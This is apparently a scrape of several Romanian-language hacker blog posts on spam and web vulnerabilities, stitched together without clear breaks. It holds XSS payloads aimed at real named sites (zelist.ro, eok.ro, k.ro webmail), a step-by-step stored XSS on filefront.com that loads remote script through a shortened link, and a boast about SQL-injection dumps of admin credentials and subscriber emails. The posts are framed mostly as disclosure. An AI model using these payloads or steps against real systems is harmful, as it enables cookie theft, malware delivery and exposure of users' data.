Nu foloseste cam la nimic, e doar de plictiseala. Mai tarziu punem si articolele cu adevarat interesante.

http://www.zelist.ro/expresii/top-7zile/cautare?ex=”><script>alert(“XSS”)</script>

Now it’s time to get some sleep.

Ceea ce vedeti in imagine este un simplu php bulk mailer. Dupa cum spuneam si in articolul anterior, aceasta unealta este destul de eficienta si des intalnita in tot ceea ce este legat de spamul in casutele de mail. Observati cat de usor se pot falsifica toate datele senderului de la nume pana la adresa de mail.

Sa facem o descriere succinta a mailerului.

Read the rest of this entry»

Rapida prezentare pe care o voi face in acest articol nu se vrea a fi o metoda de educare a spammerilor ci o modalitate de a explica utilizatorului de rand care sunt etapele, scopul si mijloacele folosite de acesti oameni, pentru a sti ce il asteapta la doar un click distanta si procesul din care, fara voia lui, face parte. Articolul este scris la 5 dimineata asa ca imi cer scuze daca exprimarea mea e prea greoaie.

Trimiterea mesajelor nesolicitate in casutele de mail este una dintre cele mai ilegale metode de promovare dar in acelasi timp extrem de eficienta pentru marirea rapida a traficului.

Ei bine exista si in acest domeniu oameni profesionisti si cei care incearca marea cu degetul.

Un spammer profesionist isi cunoaste tinta, stie ce tip de trafic doreste, lucreaza cu unelte mai avansate de spam. Cel ocazional/incepator isi atinge scopul doar pentru scurt timp, nu targeteaza oamenii ce ar trebui contactati, totul se petrece haotic si se bazeaza pe noroc.

Voi explica acum care sunt diferentele dintre un spammer profi si unul ocazional si pasii pe care ii urmeaza inainte de a incepe distribuirea mesajelor.
Read the rest of this entry»

Pe cuvant ca ii dadeam un simplu delete la comment daca nu vedeam asta.

Uite iti promit eu ca nu o sa te luam la misto ca dai spam cu bux.to si promit ca nu o sa te dezamagesc spunandu-ti ca bux.to este o teapa la care doar copii de 12 ani mai pun boticul. Iti urez succes in meseria de spammer si la castigarea celor 10 centi pe an.

In final il poop dolce pe deffblackpanther@yahoo.com si ii urez sa isi gaseasca cat mai repede perechea ca sa nu mai fie nevoit sa apeleze la Monica, cea de-a doua lui personalitate.

Azi am intalnit pentru prima data un virus ce trece peste protectia deepfreeze. Nimic extraordinar de nou dar totusi destul de rar intalnit.

Nu vreau sa dezvolt subiectul dar recomand cu caldura un mic programel (destul de cunoscut) ce rar da gres cand este vorba de eliminarea virusilor din sistemul de operare Windows XP. Acolo unde produsele antivirus ce costa sute de dolari dau gres, SmitfraudFix rezolva problema in 5 minute. E gratuit, extrem de eficient si il recomand.

In cazul meu de azi a reusit sa elimine extrem de rapid ceea ce Nod32, Bitdefender, Norton2005 si Kaspersky (updatate la zi) nu au putut. Din contra, nici macar nu au “mirosit” ca exista o problema cu acele fisiere.

Linkuri de download:

http://siri.urz.free.fr/Fix/SmitfraudFix_En.php

http://siri.geekstogo.com/SmitfraudFix.exe

http://downloads.securitycadets.com/SmitfraudFix.exe

Zebulon.fr

Cu totii am primit mesaje de tip spam in mail, forumuri, bloguri sau pe profilele site-urilor de tip social network (hi5, myspace, neogen etc). Mesajele de tip spam sunt extrem de enervante, cele trimise in mail sunt ilegale (chiar si la noi). Pierdem timpul cu ele stergandu-le, apasand butonul “spam” aproape zilnic si intrebandu-ne de unde au luat spammerii adresa noastra de mail.

Hai sa lamurim in primul rand cam ce ar dori un spammer sa realizeze prin actiunile sale:

1. Marirea traficului pe un site sau pe o intreaga retea de site-uri.

2. Infectarea masiva cu programe de tip adware/malware/spyware.

3. Distribuirea de produse originale sau contrafacute (ex: pharmacy spam).

4. Phishing pentru aflarea datelor personale a diferitelor persoane.

- in aceasta categorie putem include si vizitarea unei pagini ce contine vulnerabilitati xss avand ca unic scop “furtul” sesiunii de logare (cookie stealer/grabber)

5. Hoax-uri/pacaleli menite sa induca oamenii in eroare.

6. Cresterea numarului de voturi la diferite concursuri in care castigarea premiilor depinde de voturile vizitatorilor.

Tipurile de spam:

1. Spam prin mesaje trimise la un numar ridicat de adrese mail.

2. Spam prin intermediul retelelor sociale (hi5, myspace etc).

3. Spam prin IM (msn messenger, YM! etc.), sau pe servere de chat (ex: IRC).

4. Spam prin intermediul comentariilor (forumuri, bloguri, guestbooks etc).

* acest tip de spam este de obicei automatizat prin folosirea unor boti sau scripturi

5. Spam prin mesaje telefonice.

6. SEO Spam – bombardarea motoarelor de cautare cu cuvinte cheie.

Da,penibil.Va spun de ce.Am vazut nenumarate site-uri mari vulnerabile la sql injection, dar putine (poate nici 1%) afisau la interogare mai mult de un singur rezultat.Jurnalul afiseaza cateva mii, usurand enorm munca celui care ar vrea sa extraga datele. (Prin adaugarea unui singur rand in fisierul de configurare s-ar putea elimina aceasta posibilitate … dar e greu, cand lumea e plina de “specialisti” it ).
Sa vedem denumirile bazelor de date:

Tabelul adminilor cu username, parola si adresa lor email (de rasul lumii … au mailbox pe yahoo si gmail, doar unul din ei are pe jurnalul)

Sa vedem acum lista bogata cu adresele de email a celor inscrisi pt newsletter (spammerii sa se abtina)

In final datele de logare a userilor pentru forum (incepand cu admin,victor ciutacu,etc)

Acest articol este scris atat in limba engleza cat si in limba romana.

I found a way to include a permanent XSS in a comment to the files uploaded on filesharing site filefront.com. Permanent XSS can do more damage then you might think. This XSS allows javascript into comments and then can be executed when the user downloads the file.

I wanted to download a file from fliefront.com and right when I entered the download page the antivirus warned me of a file orz.exe. I was asked if to run that file or not. I clicked “no” and i looked for it. It was in my Temp folder. I analised that web page and I noticed that there was a particular comment that had a javascript code in it. It forced the web browser to open a flash file (.swf) which was actaully a Flahs Player 9 exploit through which it was downloading and runing an .exe file without the user consent. This is a serious security issue. How to get the XSS: create an account on filefront. Log in, click on Add Blog and you will get a “add blog entry” page. The title is not filtered. This is where you inject teh javascript. The only problem you will encounter is the character limit, 50 that is. Therefore the easiest would be <script src=…, something like: lol<script src=http://tinyurl.com/xxxxxx>&lt/script>
I used tinyurl.com to shorten the number of characters. Do not use the ‘ character at src= ‘ ‘
After you created the blog entry, go to the page where you want to “corrupt” the comments and post something. Edit the post and click on Insert Object and then -> Insert Blog. Select from that list the blog entry you just created, Insert Blog, click on “Edit comment”. Thats all

Proof of concept: http://files.filefront.com/testtxt/1;12934435;/fileinfo.html As I was saying, in my case the .exe started to download because I was using Flash Player 9. It doesn’t matter what browser you are using as long as you have javascript enabled. You can get infected with javascript disabled also if you enter a page that has hidden somewhere in the html code something that can open a .swf My advise is to update to the latest version of Flash Player: http://get.adobe.com/flashplayer/

Romanian version:

Am gasit o metoda prin care sa bag un XSS permanent intr-un comentariu la fisierele uploadate pe cunoscutul site de file-upload filefront.com. Probabil spuneti ca nu poti face mare branza cu un XSS, dar va inselati, mai ales in cazul XSS-urilor permanente.

Prin intermediul acestuia putem posta javascript in comentarii, javascript care va fi executat fara stirea userului care intra sa downloadeze fisierul.

Vroiam sa downloadez un fisier de pe filefront si imediat ce am intrat pe pagina de download antivirusul m-a avertizat ca un fisier orz.exe tocmai a fost lansat si ca pare unsafe, intrebandu-ma daca il las sa se execute. Am dat “no”, am cautat fisierul, era prin Temp. Am analizat pagina respectiva si am vazut ca printre comentarii exista unul mai “suspect” care avea injectat si un cod javascript. Acesta forta browserul sa deschida un fisier flash (.swf) care era defapt un exploit pentru Flash Player 9 prin intermediul caruia downloada si rula un .exe fara stirea utilizatorului, fapt care reprezinta o problema foarte grava de securitate.

XSS-ul se obtine in felul urmator: va faceti un cont pe filefront, va logati, dati in stanga la ADD BLOG si o sa va apara o pagina de “add blog entry”. Titlul este nefiltrat, acolo veti injecta cod javascript. Singura problema e ca exista limita de caractere, 50, deci cel mai usor ar fi cu un <script src=..., ceva de genul: lol<script src=http://tinyurl.com/xxxxxx></script>
Am folosit tinyurl.com pentru un link mai scurt sa ne incadram in limita de 50 caractere. Nu folositi ‘ la src=”
Dupa ce ati creat blog entry-ul, mergeti pe pagina fisierului a carui comentarii vreti sa le “infectati” si postati ceva. Editati postul si dati la Insert Object -> Insert Blog. Selectati din lista aia blog entry-ul creat adineauri, Insert Blog, click pe “Edit comment” si gata.

Proof of concept: http://files.filefront.com/testtxt/1;12934435;/fileinfo.html

Cum ziceam, la mine a ajuns sa se downloadeze .exe-ul din cauza faptului ca aveam Flash Player 9. Nu conteaza browserul. Putea sa fi fost Internet Explorer, FireFox, Opera, etc, daca aveam javascript enabled tot ma “prindea”. Si chiar si cu javascript disabled poti fi infectat, din simplul motiv ca poti intra pe o pagina unde sa fie pe undeva ascunsa o bucata de cod HTML care sa deschida un .swf si tot va infectati.
Va sfatuiesc sa va updatati de urgenta la ultima versiune de flash player (momentan e 10): http://get.adobe.com/flashplayer/

Dupa cum v-am obisnuit deja, in fiecare luna imi rup 5 minute din viata pentru a mai gasi un loc in eok.ro in care sa injectez javascript. De aceasta data in forum am putut sa imi adaug micul meu script. Desigur ca este permanent si functioneaza pe orice browser.

Las imaginea sa vorbeasca de la sine.

Baieti, fara sa incerc sa va ofensez cumva, cat timp exista eok.ro se pare ca nu vom duce nici lipsa de articole. Oricum primul nostru articol a fost despre eok.ro asa ca exista niste sentimente :X

Thanks.

Alte articole referitoare la acest site:

http://hackersblog.org/?s=eok&searchBtn_nav=GO

http://k.ro este unul dintre cele mai vechi portaluri mari romanesti, portal ce a adus pe piata romaneasca numeroase servicii gratuite. Din pacate odata cu aparitia acestor servicii nimeni nu si-a mai dat interesul sa se ocupe de dezvoltarea unora dintre ele si totul a ramas cam la fel ca acum cativa ani.

Azi vom vedea rezultatele unui test extrem de simplu efectuat in serviciul de mail.

Partea buna:

Cand sunt atasate fisiere ce contin javascript sistemul filtreaza contentul. Nu va ganditi ca am testat toate posibilitatile de a trece peste filtre asa ca este posibil sa ma insel.

Partea rea:

Mi-am trimis singur un mail folosind un bulk mailer. In continutul mesajului am adaugat cea mai simpla sintaxa posibila si anume <script>alert(document.cookie)</script>.

Rezultatul?

Dupa ce dam click pe fisierul atasat se va intampla asta:

Concluzia? Serviciul de mail oferit de k.ro sucks.

E extrem de periculos pentru utilizatorii sai si posibilitatile de atac sunt destul de multe:

- xss worm folosit la spam;

- redirectionare catre un alt domeniu;

- introducerea unui iframe ce pacaleste userul sa isi bage datele de logare pe o pagina identica cu cea de logare in mailul k.ro;

- furtul de cookies folosite la sesiunea userului si desigur accesarea casutei de mail folosindu-se acele cookies;

- propagarea virusilor prin exploituri aflate, desigur, in fisierele html atasate.

Problema este veche dar nimeni nu a luat masuri. Probabil nici nu o vor face vreodata.

Astept in continuare linkuri catre servicii webmail gratuite.